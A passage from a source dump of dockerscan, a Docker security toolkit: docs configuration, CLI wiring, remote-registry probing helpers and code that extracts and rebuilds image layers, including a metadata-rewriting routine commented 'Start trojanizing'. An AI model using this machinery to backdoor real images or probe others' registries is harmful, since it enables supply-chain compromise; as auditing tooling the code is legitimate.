25 | # If your documentation needs a minimal Sphinx version, state it here.
26 | #needs_sphinx = '1.0'
27 |
28 | # Add any Sphinx extension module names here, as strings. They can be
29 | # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
30 | # ones.
31 |
32 | extensions = [
33 | 'alabaster',
34 | 'sphinxcontrib.asyncio',
35 | 'sphinx.ext.autodoc',
36 | 'sphinx.ext.viewcode',
37 | 'sphinx.ext.mathjax'
38 | ]
39 |
40 | # Add any paths that contain templates here, relative to this directory.
41 | templates_path = ['_templates']
42 |
43 | # The suffix(es) of source filenames.
44 | # You can specify multiple suffix as a list of string:
45 | # source_suffix = ['.rst', '.md']
46 | source_suffix = '.rst'
47 |
48 | # The encoding of source files.
49 | #source_encoding = 'utf-8-sig'
50 |
51 | # The master toctree document.
52 | master_doc = 'index'
53 |
54 | # General information about the project.
55 | project = u'dockerscan'
56 | copyright = u'2017, Daniel Garcia (cr0hn) / Roberto Munoz'
57 | author = u'Daniel Garcia (cr0hn) / Roberto Munoz'
58 |
59 | # The version info for the project you're documenting, acts as replacement for
60 | # |version| and |release|, also used in various other places throughout the
61 | # built documents.
62 | #
63 |
64 | # This code was taken from Flask conf: https://github.com/pallets/flask/blob/master/docs/conf.py
65 | # try:
66 | # release = pkg_resources.get_distribution('aspitest').version
67 | # except pkg_resources.DistributionNotFound:
68 | # print('APITest must be installed to build the documentation.')
69 | # print('Install from source using `pip install -e .` in a virtualenv.')
70 | # sys.exit(1)
71 | #
72 | # if 'dev' in release:
73 | # release = ''.join(release.partition('dev')[:2])
74 | #
75 | # version = '.'.join(release.split('.')[:2])
76 | version = "1.0.0"
77 | release = "1.0.0"
78 |
79 |
80 | # The language for content autogenerated by Sphinx. Refer to documentation
81 | # for a list of supported languages.
82 | #
83 | # This is also used if you do content translation via gettext catalogs.
84 | # Usually you set "language" from the command line for these cases.
85 | language = "en"
86 |
87 | # There are two options for replacing |today|: either, you set today to some
88 | # non-false value, then it is used:
89 | #today = ''
90 | # Else, today_fmt is used as the format for a strftime call.
91 | #today_fmt = '%B %d, %Y'
92 |
93 | # List of patterns, relative to source directory, that match files and
94 | # directories to ignore when looking for source files.
95 | exclude_patterns = []
96 |
97 | # The reST default role (used for this markup: `text`) to use for all
98 | # documents.
99 | #default_role = None
100 |
101 | # If true, '()' will be appended to :func: etc. cross-reference text.
102 | #add_function_parentheses = True
103 |
104 | # If true, the current module name will be prepended to all description
105 | # unit titles (such as .. function::).
106 | #add_module_names = True
107 |
108 | # If true, sectionauthor and moduleauthor directives will be shown in the
109 | # output. They are ignored by default.
110 | #show_authors = False
111 |
112 | # The name of the Pygments (syntax highlighting) style to use.
113 | pygments_style = 'sphinx'
114 | highlight_language = "python3"
115 |
116 | # A list of ignored prefixes for module index sorting.
117 | #modindex_common_prefix = []
118 |
119 | # If true, keep warnings as "system message" paragraphs in the built documents.
120 | #keep_warnings = False
121 |
122 | # If true, `todo` and `todoList` produce output, else they produce nothing.
123 | todo_include_todos = False
124 |
125 |
126 | # -- Options for HTML output ----------------------------------------------
127 |
128 | # The theme to use for HTML and HTML Help pages. See the documentation for
129 | # a list of builtin themes.
130 | html_theme = 'alabaster'
131 |
132 | # Theme options are theme-specific and customize the look and feel of a theme
133 | # further. For a list of options available for each theme, see the
134 | # documentation.
135 |
136 | html_theme_options = {
137 | 'logo': 'dockerscan-logo.png',
138 | 'description': 'A Docker analysis tools',
139 | 'github_user': 'cr0hn',
140 | 'github_repo': 'dockerscan',
141 | 'github_button': True,
142 | 'github_type': 'star',
143 | 'github_banner': True,
144 | 'travis_button': True,
145 | 'codecov_button': True,
146 | 'pre_bg': '#FFF6E5',
147 | 'note_bg': '#E5ECD1',
148 | 'note_border': '#BFCF8C',
149 | 'body_text': '#482C0A',
150 | 'sidebar_text': '#49443E',
151 | 'sidebar_header': '#4B4032',
152 | 'show_powered_by': False
153 | }
154 |
155 |
156 | # The name of an image file (within the static path) to use as favicon of the
157 | # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
158 | # pixels large.
159 | html_favicon = "favicon.ico"
160 |
161 | # Add any paths that contain custom static files (such as style sheets) here,
162 | # relative to this directory. They are copied after the builtin static files,
163 | # so a file named "default.css" will overwrite the builtin "default.css".
164 | html_static_path = ['_static']
165 |
166 | # If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
167 | # using the given strftime format.
168 | #html_last_updated_fmt = '%b %d, %Y'
169 |
170 | # If true, SmartyPants will be used to convert quotes and dashes to
171 | # typographically correct entities.
172 | html_use_smartypants = True
173 |
174 | # Custom sidebar templates, maps document names to template names.
175 | html_sidebars = {
176 | '**': [
177 | 'about.html',
178 | 'navigation.html',
179 | 'searchbox.html',
180 | 'localtoc.html',
181 | 'relations.html',
182 | 'sourcelink.html',
183 | 'searchbox.html'
184 | ]
185 | }
186 |
187 | # If false, no module index is generated.
188 | #html_domain_indices = True
189 |
190 | # If false, no index is generated.
191 | #html_use_index = True
192 |
193 | # If true, the index is split into individual pages for each letter.
194 | #html_split_index = False
195 |
196 | # If true, links to the reST sources are added to the pages.
197 | #html_show_sourcelink = True
198 |
199 | # If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
200 | # html_show_sphinx = False
201 |
202 | # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
203 | #html_show_copyright = True
204 |
205 | # If true, an OpenSearch description file will be output, and all pages will
206 | # contain a <link> tag referring to it. The value of this option must be the
207 | # base URL from which the finished HTML is served.
208 | #html_use_opensearch = ''
209 |
210 | # Language to be used for generating the HTML full-text search index.
211 | # Sphinx supports the following languages:
212 | # 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
213 | # 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
214 | html_search_language = 'en'
215 |
216 | # A dictionary with options for the search language support, empty by default.
217 | # Now only 'ja' uses this config value
218 | #html_search_options = {'type': 'default'}
219 |
220 | # The name of a javascript file (relative to the configuration directory) that
221 | # implements a search results scorer. If empty, the default will be used.
222 | #html_search_scorer = 'scorer.js'
223 |
224 | # Output file base name for HTML help builder.
225 | htmlhelp_basename = 'dockerscan'
226 |
227 | # -- Options for LaTeX output ---------------------------------------------
228 |
229 | latex_elements = {
230 | # The paper size ('letterpaper' or 'a4paper').
231 | #'papersize': 'letterpaper',
232 |
233 | # The font size ('10pt', '11pt' or '12pt').
234 | #'pointsize': '10pt',
235 |
236 | # Additional stuff for the LaTeX preamble.
237 | #'preamble': '',
238 |
239 | # Latex figure (float) alignment
240 | #'figure_align': 'htbp',
241 | }
242 |
243 | # Grouping the document tree into LaTeX files. List of tuples
244 | # (source start file, target name, title,
245 | # author, documentclass [howto, manual, or own class]).
246 | latex_documents = [
247 | (master_doc, 'dockerscan.tex', u'API-Test Documentation',
248 | u'Daniel Garcia - cr0hn', 'manual'),
249 | ]
250 |
251 | # The name of an image file (relative to this directory) to place at the top of
252 | # the title page.
253 | #latex_logo = None
254 |
255 | # For "manual" documents, if this is true, then toplevel headings are parts,
256 | # not chapters.
257 | #latex_use_parts = False
258 |
259 | # If true, show page references after internal links.
260 | #latex_show_pagerefs = False
261 |
262 | # If true, show URL addresses after external links.
263 | #latex_show_urls = False
264 |
265 | # Documents to append as an appendix to all manuals.
266 | #latex_appendices = []
267 |
268 | # If false, no module index is generated.
269 | #latex_domain_indices = True
270 |
271 |
272 | # -- Options for manual page output ---------------------------------------
273 |
274 | # One entry per manual page. List of tuples
275 | # (source start file, name, description, authors, manual section).
276 | man_pages = [
277 | (master_doc, 'dockerscan', u'dockerscan Documentation',
278 | [author], 1)
279 | ]
280 |
281 | # If true, show URL addresses after external links.
282 | #man_show_urls = False
283 |
284 |
285 | # -- Options for Texinfo output -------------------------------------------
286 |
287 | # Grouping the document tree into Texinfo files. List of tuples
288 | # (source start file, target name, title, author,
289 | # dir menu entry, description, category)
290 | texinfo_documents = [
291 | (master_doc, 'dockerscan', u'dockerscan',
292 | author, 'Daniel Garcia (cr0hn) / Roberto Munoz', 'A Docker analysis tools',
293 | 'Miscellaneous'),
294 | ]
295 |
296 | # Documents to append as an appendix to all manuals.
297 | #texinfo_appendices = []
298 |
299 | # If false, no module index is generated.
300 | #texinfo_domain_indices = True
301 |
302 | # How to display URL addresses: 'footnote', 'no', or 'inline'.
303 | #texinfo_show_urls = 'footnote'
304 |
305 | # If true, do not generate a @detailmenu in the "Top" node's menu.
306 | #texinfo_no_detailmenu = False
307 |
308 |
309 | # -- Options for Epub output ----------------------------------------------
310 |
311 | # Bibliographic Dublin Core info.
312 | epub_title = project
313 | epub_author = author
314 | epub_publisher = author
315 | epub_copyright = copyright
316 |
317 | # The basename for the epub file. It defaults to the project name.
318 | #epub_basename = project
319 |
320 | # The HTML theme for the epub output. Since the default themes are not
321 | # optimized for small screen space, using the same theme for HTML and epub
322 | # output is usually not wise. This defaults to 'epub', a theme designed to save
323 | # visual space.
324 | #epub_theme = 'epub'
325 |
326 | # The language of the text. It defaults to the language option
327 | # or 'en' if the language is not set.
328 | #epub_language = ''
329 |
330 | # The scheme of the identifier. Typical schemes are ISBN or URL.
331 | #epub_scheme = ''
332 |
333 | # The unique identifier of the text. This can be a ISBN number
334 | # or the project homepage.
335 | #epub_identifier = ''
336 |
337 | # A unique identification for the text.
338 | #epub_uid = ''
339 |
340 | # A tuple containing the cover image and cover page html template filenames.
341 | #epub_cover = ()
342 |
343 | # A sequence of (type, uri, title) tuples for the guide element of content.opf.
344 | #epub_guide = ()
345 |
346 | # HTML files that should be inserted before the pages created by sphinx.
347 | # The format is a list of tuples containing the path and title.
348 | #epub_pre_files = []
349 |
350 | # HTML files shat should be inserted after the pages created by sphinx.
351 | # The format is a list of tuples containing the path and title.
352 | #epub_post_files = []
353 |
354 | # A list of files that should not be packed into the epub file.
355 | epub_exclude_files = ['search.html']
356 |
357 | # The depth of the table of contents in toc.ncx.
358 | #epub_tocdepth = 3
359 |
360 | # Allow duplicate toc entries.
361 | #epub_tocdup = True
362 |
363 | # Choose between 'default' and 'includehidden'.
364 | #epub_tocscope = 'default'
365 |
366 | # Fix unsupported image types using the Pillow.
367 | #epub_fix_images = False
368 |
369 | # Scale large images.
370 | #epub_max_image_width = 0
371 |
372 | # How to display URL addresses: 'footnote', 'no', or 'inline'.
373 | #epub_show_urls = 'inline'
374 |
375 | # If false, no index is generated.
376 | #epub_use_index = True
377 |
--------------------------------------------------------------------------------
/doc/source/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cr0hn/dockerscan/590a844418038d25e6649e609ef630868e0c9161/doc/source/favicon.ico
--------------------------------------------------------------------------------
/doc/source/index.rst:
--------------------------------------------------------------------------------
1 | Welcome to dockerscan's documentation!
2 | ======================================
3 |
4 | +----------------+--------------------------------------------------+
5 | |Project site | http://github.com/cr0hn/dockerscan |
6 | +----------------+--------------------------------------------------+
7 | |Author | Daniel Garcia (cr0hn) / Roberto Munoz (robskye) |
8 | +----------------+--------------------------------------------------+
9 | |Documentation | http://dockerscan.readthedocs.org |
10 | +----------------+--------------------------------------------------+
11 | |Last Version | 1.0.0a1 |
12 | +----------------+--------------------------------------------------+
13 | |Python versions | 3.5 or above |
14 | +----------------+--------------------------------------------------+
15 |
16 | A Docker analysis toolkit
17 |
18 | Contents
19 | ++++++++
20 |
21 | .. toctree::
22 | :maxdepth: 2
23 |
24 | quickstart
25 | install
26 | registries
27 | images
28 | scan
29 |
30 | Indices and tables
31 | ==================
32 |
33 | * :ref:`genindex`
34 | * :ref:`modindex`
35 | * :ref:`search`
36 |
37 |
--------------------------------------------------------------------------------
/doc/source/quickstart.rst:
--------------------------------------------------------------------------------
1 | Quick Start
2 | ===========
3 |
4 | Quick start doc of dockerscan.
--------------------------------------------------------------------------------
/dockerscan/__init__.py:
--------------------------------------------------------------------------------
1 | from .core import *
2 | from .actions import *
3 |
4 | __version__ = "1.0.0-a4"
5 |
--------------------------------------------------------------------------------
/dockerscan/__main__.py:
--------------------------------------------------------------------------------
1 | def main():
2 | import os
3 | import sys
4 |
5 | if sys.version_info < (3, 5,):
6 | print("To run dockerscan you Python 3.5+")
7 | sys.exit(0)
8 |
9 | parent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
10 | sys.path.insert(1, parent_dir)
11 | import dockerscan
12 |
13 | __package__ = str("dockerscan")
14 |
15 | # Run the cmd
16 | from dockerscan.actions.cli import cli
17 |
18 | cli()
19 |
20 | if __name__ == "__main__": # pragma no cover
21 | main()
22 |
--------------------------------------------------------------------------------
/dockerscan/actions/__init__.py:
--------------------------------------------------------------------------------
1 | from .scan import *
2 | from .helpers import *
3 | from .registry import *
4 |
--------------------------------------------------------------------------------
/dockerscan/actions/cli.py:
--------------------------------------------------------------------------------
1 | import click
2 | import logging
3 |
4 | from dockerscan import global_options
5 |
6 | from .scan.cli import scan
7 | from .image.cli import image
8 | from .registry.cli import registry
9 |
10 | log = logging.getLogger('dockerscan')
11 |
12 |
13 | @global_options()
14 | @click.pass_context
15 | def cli(ctx, **kwargs):
16 | ctx.obj = kwargs
17 |
18 | cli.add_command(scan)
19 | cli.add_command(image)
20 | cli.add_command(registry)
21 |
22 |
23 | if __name__ == "__main__" and __package__ is None: # pragma no cover
24 | cli()
25 |
--------------------------------------------------------------------------------
/dockerscan/actions/helpers.py:
--------------------------------------------------------------------------------
1 | import ssl
2 | import socket
3 | import logging
4 |
5 | from typing import Union, Set
6 | from urllib.parse import urlparse
7 | from collections import defaultdict
8 |
9 | import requests
10 |
11 | from requests.exceptions import ConnectTimeout, ConnectionError
12 |
13 | from ..core.model import SharedConfig
14 | from ..core.exceptions import DockerscanTimeoutError
15 |
16 | requests.packages.urllib3.disable_warnings()
17 |
18 |
19 | def check_console_input_config(config: SharedConfig,
20 | log: logging.Logger = None) -> bool:
21 |
22 | log = log or logging.getLogger(__package__.split(".", maxsplit=1)[0])
23 |
24 | # Check if config is valid
25 | if not config.is_valid:
26 | for prop, msg in config.validation_errors:
27 |
28 | log.critical("[!] '%s' property %s" % (prop, msg))
29 | return False
30 |
31 | return True
32 |
33 |
34 | def sanitize_url(url: str, port: int = 5000, schema: str = "http") -> str:
35 | if ":" not in url:
36 | url = "{}:{}".format(url, port)
37 |
38 | if not url.startswith("http"):
39 | url = "http://{}".format(url)
40 |
41 | return url
42 |
43 |
44 | def get_ssl_common_names(remote: str) -> set:
45 | """This function extract the Common Names from a SSL certificate"""
46 |
47 | # Extract info from URL
48 | scheme, hostname, *_ = urlparse(remote)
49 |
50 | if ":" in hostname:
51 | hostname, port = hostname.split(":")
52 | port = int(port)
53 | elif "https" == scheme:
54 | hostname, port = hostname, 443
55 | else:
56 | return set()
57 |
58 | ret = set()
59 |
60 | ctx = ssl.create_default_context()
61 | s = ctx.wrap_socket(socket.socket(), server_hostname="*")
62 | try:
63 | s.connect((hostname, port))
64 | except ssl.CertificateError as e:
65 | key = "match either of "
66 | msg = str(e)
67 |
68 | # Extract domain from SSL CN
69 | msg = msg[msg.index(key) + len(key):]
70 |
71 | # Clear
72 | domains = msg.replace("'", "").replace(" ", "")
73 |
74 | # Unify domains
75 | for domain in domains.split(","):
76 | if domain.startswith("*"):
77 | domain = domain[2:]
78 |
79 | ret.add(domain)
80 | except ssl.SSLError:
81 | pass
82 |
83 | return ret
84 |
85 |
86 | def get_remote_registry_info(target: str) -> Union[Set,
87 | DockerscanTimeoutError]:
88 | """
89 | This function does two things:
90 |
91 | - detect the remote registry version. Allowed returned values are: {1, 2}
92 | - detect if remote Docker Registry has enabled the authentication
93 |
94 | :return: a tuple as format: (REMOTE_VERSION, ENABLED_OR_NOT_AUTH)
95 | :rtype: tuple(int, bool)
96 |
97 | :raise DockerscanTimeoutError: If remote server reach a timeout
98 | """
99 | #
100 | # Check for version 2
101 | #
102 | remote_version = 1
103 | enabled_auth = False
104 |
105 | try:
106 | r = requests.get("{}/v2/".format(target),
107 | timeout=2,
108 | allow_redirects=False,
109 | verify=False)
110 |
111 | if r.status_code in (200, 401):
112 | if "registry/2.0" in r.headers["Docker-Distribution-Api-Version"]:
113 | remote_version = 2
114 |
115 | if r.status_code == 401:
116 | enabled_auth = True
117 |
118 | return remote_version, enabled_auth
119 |
120 | except (ConnectTimeout, ConnectionError) as e:
121 | raise DockerscanTimeoutError("Remote registry '{}' does not respond".
122 | format(target))
123 |
124 |
125 | def display_results_console(results: Union[dict, list], log, start_padding=0):
126 |
127 | # Check if results is and object / class or a basic type:
128 | if str(type(results))[8:].strip().startswith("dockerscan"):
129 | results = {x: y for x, y in results.__dict__.items()
130 | if not x.startswith("_") and y and type(y) is not bool}
131 |
132 | prefix_symbols = ["-", ">", "+", "_", "\\"]
133 |
134 | padding = "{}{} ".format(" " * (0 if start_padding == 0
135 | else start_padding * 2),
136 | prefix_symbols[start_padding],)
137 | new_padding = start_padding + 1
138 |
139 | if isinstance(results, dict):
140 | for prop, value in results.items():
141 | # Do not put: "not value" because it will ignore entries
142 | # with value "False", and we want those values
143 | pretty_prop = prop.capitalize().replace("_", " ")
144 |
145 | # List will be displayed different
146 | if type(value) not in (bytes, str, int, float, bool):
147 | log.console("{}{}:".format(padding,
148 | pretty_prop))
149 |
150 | display_results_console(value,
151 | log,
152 | new_padding)
153 | # Plain properties
154 | else:
155 | log.console("{}{} = {}".format(padding,
156 | pretty_prop,
157 | value))
158 |
159 | elif isinstance(results, (list, set, tuple)):
160 | for p in results:
161 | if isinstance(p, (str, bytes)):
162 | log.console("{}{}".format(padding,
163 | p))
164 | else:
165 | # log.console("{} - {}:".format(p,
166 | # padding))
167 | display_results_console(p, log, new_padding)
168 |
169 |
170 | __all__ = ("check_console_input_config", "get_remote_registry_info",
171 | "sanitize_url", "display_results_console")
172 |
--------------------------------------------------------------------------------
/dockerscan/actions/image/__init__.py:
--------------------------------------------------------------------------------
1 | from .api import *
2 | from .model import *
3 | from .docker_api import *
4 |
--------------------------------------------------------------------------------
/dockerscan/actions/image/api.py:
--------------------------------------------------------------------------------
1 | import tempfile
2 |
3 | from ...core import DockerscanError
4 |
5 | from .model import *
6 | from .docker_api import *
7 | from .image_analyzer import *
8 |
9 |
10 | def run_image_info_dockerscan(config: DockerImageInfoModel) -> DockerImageInfo:
11 | assert isinstance(config, DockerImageInfoModel)
12 |
13 | # Get docker info
14 | docker_info = DockerImageInfo()
15 | for layer in get_docker_image_layers(config.image_path):
16 | docker_info.add_layer_info(layer)
17 |
18 | return docker_info
19 |
20 |
21 | def run_image_extract_dockerscan(config: DockerImageExtractModel):
22 | assert isinstance(config, DockerImageExtractModel)
23 |
24 | extract_docker_image(config.image_path,
25 | config.extract_path)
26 |
27 |
28 | def run_image_analyze_dockerscan(config: DockerImageAnalyzeModel):
29 | assert isinstance(config, DockerImageAnalyzeModel)
30 |
31 | with tempfile.TemporaryDirectory() as tmp_dir:
32 |
33 | # Get docker info
34 | docker_info = DockerImageInfo()
35 |
36 | try:
37 | for layer in get_docker_image_layers(config.image_path):
38 | docker_info.add_layer_info(layer)
39 | except KeyError as e:
40 | raise DockerscanError(e)
41 |
42 | # Extract docker data
43 | extract_docker_image(config.image_path,
44 | tmp_dir)
45 |
46 | # Run the analysis
47 | analysis_results = analyze_docker_image(tmp_dir, docker_info)
48 |
49 | return analysis_results
50 |
51 |
52 | __all__ = ("run_image_info_dockerscan",
53 | "run_image_extract_dockerscan",
54 | "run_image_analyze_dockerscan",)
55 |
--------------------------------------------------------------------------------
/dockerscan/actions/image/cli.py:
--------------------------------------------------------------------------------
1 | import click
2 |
3 |
4 | from .model import *
5 | from .console import *
6 | from .modifiers.cli import *
7 | from ..helpers import check_console_input_config
8 |
9 |
10 | @click.group(help="Docker images commands")
11 | @click.pass_context
12 | def image(ctx, **kwargs):
13 | pass
14 |
15 |
16 | @image.command(help="get docker image information")
17 | @click.pass_context
18 | @click.argument("image_path")
19 | def info(ctx, **kwargs):
20 | config = DockerImageInfoModel(**ctx.obj, **kwargs)
21 |
22 | # Check if valid
23 | if check_console_input_config(config):
24 | launch_dockerscan_image_info_in_console(config)
25 |
26 |
27 | @image.command(help="extract docker image content")
28 | @click.pass_context
29 | @click.argument("image_path")
30 | @click.argument("extract_path")
31 | def extract(ctx, **kwargs):
32 | config = DockerImageExtractModel(**ctx.obj, **kwargs)
33 |
34 | # Check if valid
35 | if check_console_input_config(config):
36 | launch_dockerscan_image_extract_in_console(config)
37 |
38 |
39 | @image.command(help="looking for sensitive data from docker image")
40 | @click.pass_context
41 | @click.argument("image_path")
42 | def analyze(ctx, **kwargs):
43 | config = DockerImageAnalyzeModel(**ctx.obj, **kwargs)
44 |
45 | # Check if valid
46 | if check_console_input_config(config):
47 | launch_dockerscan_image_analyze_in_console(config)
48 |
49 | image.add_command(modify)
50 |
--------------------------------------------------------------------------------
/dockerscan/actions/image/console.py:
--------------------------------------------------------------------------------
1 | import os
2 | import logging
3 |
4 | from dockerscan import get_log_level, run_in_console
5 |
6 | from .api import *
7 | from .model import *
8 | from ..helpers import display_results_console
9 |
10 | log = logging.getLogger('dockerscan')
11 |
12 |
13 | def launch_dockerscan_image_info_in_console(config: DockerImageInfoModel):
14 | """Launch in console mode"""
15 |
16 | log.setLevel(get_log_level(config.verbosity))
17 |
18 | with run_in_console(config.debug):
19 |
20 | log.console("Starting analyzing docker image...")
21 | log.console("Selected image: '{}'".format(
22 | os.path.basename(config.image_path)))
23 |
24 | results = run_image_info_dockerscan(config)
25 |
26 | # Display image summary
27 | log.console("Analysis finished. Results:")
28 | display_results_console(results, log)
29 |
30 |
31 | def launch_dockerscan_image_extract_in_console(config: DockerImageExtractModel):
32 | """Launch in console mode"""
33 |
34 | log.setLevel(get_log_level(config.verbosity))
35 |
36 | with run_in_console(config.debug):
37 |
38 | log.console("Starting the extraction of docker image...")
39 | log.console("Selected image: '{}'".format(
40 | os.path.basename(config.image_path)))
41 |
42 | run_image_extract_dockerscan(config)
43 |
44 | # Display image summary
45 | log.console("Image content extracted")
46 |
47 |
48 | def launch_dockerscan_image_analyze_in_console(config: DockerImageAnalyzeModel):
49 | """Launch in console mode"""
50 |
51 | log.setLevel(get_log_level(config.verbosity))
52 |
53 | with run_in_console(config.debug):
54 |
55 | log.console("Starting the analysis of docker image...")
56 | log.console("Selected image: '{}'".format(
57 | os.path.basename(config.image_path)))
58 |
59 | results = run_image_analyze_dockerscan(config)
60 |
61 | # Display image summary
62 | log.console("Analysis finished. Results:")
63 | display_results_console(results, log)
64 |
65 |
66 | __all__ = ("launch_dockerscan_image_info_in_console",
67 | "launch_dockerscan_image_extract_in_console",
68 | "launch_dockerscan_image_analyze_in_console")
69 |
--------------------------------------------------------------------------------
/dockerscan/actions/image/docker_api.py:
--------------------------------------------------------------------------------
1 | """
2 | The idea for this file was taken from the 'undocker' project. Thanks for your work and
3 | for sharing the code. It was very useful for writing this lib.
4 |
5 | Undocker project:
6 |
7 | https://github.com/larsks/undocker
8 | """
9 |
10 | import os
11 | import io
12 | import re
13 | import errno
14 | import shutil
15 | import os.path
16 | import tarfile
17 | import logging
18 | import hashlib
19 | import tempfile
20 |
21 | try:
22 | import ujson as json
23 | except ImportError:
24 | import json
25 |
26 | from typing import Dict, Tuple, List, Union
27 | from contextlib import closing, contextmanager
28 | from dockerscan import DockerscanNotExitsError, DockerscanError
29 |
30 | log = logging.getLogger("dockerscan")
31 |
32 |
33 | # --------------------------------------------------------------------------
34 | # Aux functions
35 | # --------------------------------------------------------------------------
36 | def _find_metadata_in_layers(img, id) -> dict:
37 | with closing(img.extractfile('%s/json' % id)) as fd:
38 | f_content = fd.read()
39 | if hasattr(f_content, "decode"):
40 | f_content = f_content.decode()
41 | yield json.loads(f_content)
42 |
43 |
44 | def _find_layers(img, id):
45 | with closing(img.extractfile('%s/json' % id)) as fd:
46 | f_content = fd.read()
47 | if hasattr(f_content, "decode"):
48 | f_content = f_content.decode()
49 | info = json.loads(f_content)
50 |
51 | log.debug('layer = %s', id)
52 | for k in ['os', 'architecture', 'author', 'created']:
53 | if k in info:
54 | log.debug('%s = %s', k, info[k])
55 |
56 | yield id
57 |
58 | if 'parent' in info:
59 | pid = info['parent']
60 | for layer in _find_layers(img, pid):
61 | yield layer
62 |
63 |
64 | # --------------------------------------------------------------------------
65 | # Public API
66 | # --------------------------------------------------------------------------
67 | @contextmanager
68 | def open_docker_image(image_path: str):
69 | """
70 |     This function is a context manager that opens a docker image and yields
71 |     its layers and the layers' metadata.
72 |
73 | yields img:TarFile, first_layer, image_and_tag, manifest
74 |
75 | >>> with open_docker_image("~/images/nginx:latest") as (img, first_layer, image_and_tag, manifest):
76 | print(img)
77 | print(first_layer)
78 | print(image_and_tag)
79 | print(manifest)
80 |
81 | '2dc9f5ef4d45394b3bfedbe23950de81cabd941519f59e163d243a7d4f859622'
82 | {'nginx': 'latest'}
83 | [{'Layers': ['8327c7df0d8cfe8652fc4be305e15e516b1b5bb48e13bb39780a87a58316c522/layer.tar', '076538d7e850181c3cccbdbce3a0811698efad376e2c99a72a203493739c2bf2/layer.tar', '2dc9f5ef4d45394b3bfedbe23950de81cabd941519f59e163d243a7d4f859622/layer.tar'], 'RepoTags': ['nginx:latest'], 'Config': 'db079554b4d2f7c65c4df3adae88cb72d051c8c3b8613eb44e86f60c945b1ca7.json'}]
84 |
85 | """
86 | tmp_image = os.path.basename(image_path)
87 |
88 | if ":" in tmp_image:
89 | image, tag, *_ = tmp_image.split(":", maxsplit=1)
90 | else:
91 | image, tag = tmp_image, "latest"
92 |
93 | #: Docker image layers and tags
94 | image_layers_tags = {}
95 |
96 | with tarfile.open(image_path, "r") as img:
97 |
98 | # read the manifest
99 | manifest_content = read_file_from_image(img, "manifest.json")
100 | if hasattr(manifest_content, "decode"):
101 | manifest_content = manifest_content.decode()
102 | manifest_content = json.loads(manifest_content)
103 |
104 | # Read the repo info
105 | repo_content = read_file_from_image(img, "repositories")
106 | if hasattr(repo_content, "decode"):
107 | repo_content = repo_content.decode()
108 |
109 | repos_info = json.loads(repo_content)
110 |
111 | for name, tags in repos_info.items():
112 | image_layers_tags[name] = " ".join(tags)
113 |
114 | try:
115 | top_layers = repos_info[image][tag]
116 | except KeyError:
117 | image = list(image_layers_tags.keys())[0]
118 | tag = list(repos_info[image].keys())[0]
119 |
120 | top_layers = repos_info[image][tag]
121 |
122 | yield img, top_layers, image_layers_tags, manifest_content
123 |
124 |
125 | @contextmanager
126 | def extract_layer_in_tmp_dir(img: tarfile.TarFile,
127 | layer_digest: str) -> str:
128 | """
129 |     This context manager extracts a selected layer into a temporary
130 |     directory and yields the directory path
131 |
132 | >>> with open_docker_image(image_path) as (img,
133 | top_layer,
134 | _,
135 | manifest):
136 | last_layer_digest = get_last_image_layer(manifest)
137 | with extract_layer_in_tmp_dir(img, last_layer_digest) as d:
138 | print(d)
139 | """
140 | with tempfile.TemporaryDirectory() as d:
141 |         log.debug(" > Extracting layer content in temporary "
142 | "dir: {}".format(d))
143 |
144 | extract_docker_layer(img, layer_digest, d)
145 |
146 | yield d
147 |
148 |
149 | def get_last_image_layer(manifest: Dict) -> str:
150 |     log.debug(" > Getting the last layer in the docker image")
151 |
152 | # Layers are ordered in inverse order
153 | return get_layers_ids_from_manifest(manifest)[-1]
154 |
155 |
156 | @contextmanager
157 | def modify_docker_image_metadata(image_path: str,
158 | output_docker_image: str):
159 | """
160 |     This context manager allows modifying the image metadata.
161 | 
162 |     It expects a DockerscanReturnContextManager() exception to be raised in
163 |     order to collect the wanted information from the context execution.
164 | 
165 |     The raised exception must carry 2 parameters:
166 |     - Last layer JSON metadata content
167 |     - Root layer JSON metadata content
168 |
169 | >>> with modify_docker_image_metadata(image_path,
170 | output_docker_image) as (last_layer_json,
171 | root_layer_json):
172 |
173 | new_json_data_last_layer = update_layer_user(last_layer_json,
174 | config.new_user)
175 | new_json_info_root_layer = update_layer_user(root_layer_json,
176 | config.new_user)
177 |
178 | raise DockerscanReturnContextManager(new_json_data_last_layer,
179 | new_json_info_root_layer)
180 | """
181 |
182 | # 1 - Get layers info
183 | log.debug(" > Opening docker file")
184 | with open_docker_image(image_path) as (
185 | img, top_layer, _, manifest):
186 |
187 | # 2 - Get the last layer in manifest
188 | old_layer_digest = get_last_image_layer(manifest)
189 | log.debug(" > Last layer: {}".format(old_layer_digest))
190 |
191 | with extract_layer_in_tmp_dir(img, old_layer_digest) as d:
192 |
193 | # Start trojanizing
194 |             log.info(" > Starting image modification process")
195 |
196 | new_layer_path, new_layer_digest = \
197 | build_image_layer_from_dir("new_layer.tar", d)
198 |
199 | # 5 - Updating the manifest
200 | new_manifest = build_manifest_with_new_layer(manifest,
201 | old_layer_digest,
202 | new_layer_digest)
203 |
204 |             # Read the JSON metadata of the last layer
205 | json_info_last_layer = read_file_from_image(img,
206 | "{}/json".format(
207 | old_layer_digest))
208 |
209 | json_info_last_layer = json.loads(json_info_last_layer.decode())
210 |
211 | _, json_info_root_layer = get_root_json_from_image(img)
212 |
213 | new_json_data_last_layer, new_json_info_root_layer = None, None
214 |
215 | try:
216 | yield json_info_last_layer, json_info_root_layer
217 | except Exception as e:
218 | if e.__class__.__name__ == "DockerscanReturnContextManager":
219 | new_json_data_last_layer, new_json_info_root_layer = e.args
220 |
221 | if new_json_data_last_layer is None:
222 | return
223 |
224 | # 6 - Create new docker image
225 | log.info(" > Creating new docker image")
226 | create_new_docker_image(new_manifest,
227 | output_docker_image,
228 | img,
229 | old_layer_digest,
230 | new_layer_path,
231 | new_layer_digest,
232 | new_json_data_last_layer,
233 | new_json_info_root_layer)
234 |
235 |
236 | def build_image_layer_from_dir(layer_name: str,
237 | source_dir: str) -> Tuple[str, str]:
238 | """
239 |     Create a new .tar docker layer from a directory's content and return
240 |     the new layer location and its digest
241 |
